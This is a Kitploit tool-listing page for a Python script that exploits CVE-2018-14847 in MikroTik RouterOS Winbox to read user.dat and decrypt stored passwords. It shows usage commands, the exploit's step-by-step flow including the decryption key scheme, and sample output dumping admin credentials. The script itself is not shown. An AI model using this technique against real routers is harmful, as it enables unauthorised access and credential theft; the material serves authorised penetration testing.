Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
VULNERAVEL-CVE-2018-14847---CREDENCIAIS-EXTRAIDAS — 脆弱なCVE-2018-14847 - Pythonで抽出されたMikroTik認証情報 | Kitploit
ツール/GitHubGitHub/mourafuseti/vulneravel-cve-2018-14847---credenciais-extraidas
IoTセキュリティパスワード攻撃脆弱性分析エクスプロイトネットワークセキュリティレッドチーミング
GitHubmourafuseti/vulneravel-cve-2018-14847---credenciais-extraidas

VULNERAVEL-CVE-2018-14847---CREDENCIAIS-EXTRAIDAS

脆弱なCVE-2018-14847 - Pythonで抽出されたMikroTik認証情報

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
1293ヶ月前未レビュー

ペンテストツール — /rede

ネットワーク監査および侵入テスト用のスクリプトリポジトリ。 正式な許可を得たデバイスでのみ使用してください。


CVE-2018-14847 — MikroTik Winbox Credential Extractor

説明

MikroTik RouterOS の Winbox サービスにおける未認証ファイル読み取りの脆弱性を悪用します。 ファイルハンドラー(ハンドラーID 2)は認証を検証しないため、外部の攻撃者がデバイスの全ユーザー名と パスワードを含む user.dat ファイルを読み取ることができます。

パスワードは鍵 MD5(usuario + "283i4jfkai3389") を使用した XOR で暗号化されて保存されます。 スクリプトは復号を自動的に実行します。

影響を受けるバージョン

ブランチ影響を受ける最終バージョン修正バージョン
Stable6.426.42.1
Long-term6.40.76.40.8
RC6.426.43

要件

  • Python 3.x(外部依存関係なし)
  • ターゲット上でポート 8291(Winbox)にアクセス可能であること

使用方法

root@kitploit:~
python3 cve_2018_14847.py <IP>
python3 cve_2018_14847.py <IP> --port 8291

実行例

root@kitploit:~
# Alvo padrão na porta 8291
python3 cve_2018_14847.py 192.168.1.1

# Porta customizada
python3 cve_2018_14847.py 192.168.1.1 --port 8291

エクスプロイトのフロー

root@kitploit:~
1. Conecta na porta 8291 (Winbox)
        ↓
2. Envia FIRST_PAYLOAD — abre sessão + solicita /flash/rw/store/user.dat
        ↓
3. Extrai Session ID do byte 38 da resposta
        ↓
4. Injeta Session ID no byte 19 do SECOND_PAYLOAD
        ↓
5. Envia SECOND_PAYLOAD — lê o arquivo user.dat
        ↓
6. Parseia entradas M2 → extrai usuário e senha cifrada
        ↓
7. Descriptografa senha: XOR com MD5(usuario + salt)
        ↓
8. Exibe credenciais e salva em arquivo

期待される出力

root@kitploit:~
═══════════════════════════════════════════════════════
  CVE-2018-14847  —  MikroTik Winbox Credential Dump
  Unauthenticated File Read + Password Decryption
  Afetado: RouterOS 6.29 – 6.42 (< 6.40.8 / 6.42.1)
═══════════════════════════════════════════════════════
  Alvo  : 192.168.1.1:8291
  Data  : 2026-05-20 18:06:58

[*] Conectando em 192.168.1.1:8291 ...
[+] Conectado ao serviço Winbox.
[*] Enviando payload 1 (requisição de arquivo) ...
[+] Resposta recebida (84 bytes). Session ID: 0x35
[*] Enviando payload 2 (leitura do user.dat) ...
[+] Dados recebidos (312 bytes).
[*] Analisando user.dat (257 bytes úteis) ...

═══════════════════════════════════════════════════════
  CREDENCIAIS EXTRAÍDAS
═══════════════════════════════════════════════════════
  Usuário : admin
  Senha   : senha123
  Combo   : admin:senha123
───────────────────────────────────────────────────────
[+] 1 credencial(is) encontrada(s).
[+] Resultado salvo em: mikrotik_1192.168.1.1_20260520_180658.txt

出力ファイル

結果は自動的に以下のファイルに保存されます:

root@kitploit:~
mikrotik_<IP>_<TIMESTAMP>.txt

例:mikrotik_192.168.1.1_20260520_180658.txt

内容:ターゲット IP、日付、CVE、影響を受けるバージョン、およびすべての usuário:senha ペア。

参考

  • CVE: CVE-2018-14847
  • Exploit-DB: EDB-ID #45170
  • 発見者:Omid Shojaei (@Dmitriy_area51)
  • 公開:2018年4月

フォルダ構成

root@kitploit:~
/rede/
├── README.md                        # este arquivo
├── cve_2018_14847.py                # MikroTik Winbox Credential Extractor
├── pentest_cgnat_100.64.0.0.md      # relatório de pentest CGNAT
├── pentest_roteador_192.168.2.1.md  # relatório de pentest roteador
└── mikrotik_<IP>_<TIMESTAMP>.txt    # resultados gerados pelo script

法的免責事項: これらのツールは、許可された環境でのみ使用するためのものです。 第三者システムに対する無許可の実行は、法律 12.737/2012(Carolina Dieckmann法)および ブラジル刑法第154-A条に基づく犯罪です。

ツールをダウンロード